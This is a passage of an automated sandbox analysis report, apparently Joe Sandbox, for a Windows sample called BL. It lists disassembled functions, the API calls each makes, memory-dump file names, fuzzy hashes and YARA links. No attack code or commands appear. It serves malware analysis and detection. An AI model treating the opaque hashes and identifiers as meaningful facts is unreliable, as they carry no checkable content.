                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                            • String ID: X$HH
                                                                                                                            • API String ID: 3021350936-1944015008
                                                                                                                            • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                            • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                            • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                            • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                            Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0045F4AE
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                            • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoItemMenu$Sleep_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1504565804-4108050209
                                                                                                                            • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                            • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                            • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                            • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                            Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$CreateDestroy
                                                                                                                            • String ID: ,$tooltips_class32
                                                                                                                            • API String ID: 1109047481-3856767331
                                                                                                                            • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                            • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                            • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                            • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                            Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                                            • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                                            • _wcscat.LIBCMT ref: 0045CD51
                                                                                                                            • _wcscat.LIBCMT ref: 0045CD63
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                                              • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                                            • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                            • _wcscpy.LIBCMT ref: 0045CE14
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1153243558-438819550
                                                                                                                            • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                            • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                                                            • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                            • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                                                            Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00455127
                                                                                                                            • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                            • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                            • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                            • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                            • DrawMenuBar.USER32 ref: 00455207
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1663942905-4108050209
                                                                                                                            • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                            • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                            • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                            • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                            Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1481289235-0
                                                                                                                            • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                            • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                                            • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                            • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                            Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                            • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                            • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2632138820-0
                                                                                                                            • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                            • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                            • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                            • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                            Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                            • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CursorLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3238433803-0
                                                                                                                            • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                            • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                            • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                            • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                            Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                            • _wcslen.LIBCMT ref: 00460B00
                                                                                                                            • __swprintf.LIBCMT ref: 00460B9E
                                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                            • GetParent.USER32(?), ref: 00460D40
                                                                                                                            • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                            • String ID: %s%u
                                                                                                                            • API String ID: 1899580136-679674701
                                                                                                                            • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                            • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                                            • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                            • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                                            Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                            • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                                            • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                            • API String ID: 2485709727-934586222
                                                                                                                            • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                            • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                            • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                            • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                            Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 3381189665-2761332787
                                                                                                                            • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                            • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                            • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                            • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                            Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 00434585
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 3300687185-3887548279
                                                                                                                            • Opcode ID: 22bfe96d37ff820aa9eb38f6aa26196b3985a0e9bf585a9783a7fb094f2b1cb4
                                                                                                                            • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                            • Opcode Fuzzy Hash: 22bfe96d37ff820aa9eb38f6aa26196b3985a0e9bf585a9783a7fb094f2b1cb4
                                                                                                                            • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                            Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                            • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                                            • _printf.LIBCMT ref: 0045E595
                                                                                                                            • _printf.LIBCMT ref: 0045E5B7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                            • API String ID: 3590180749-2894483878
                                                                                                                            • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                            • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                            • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
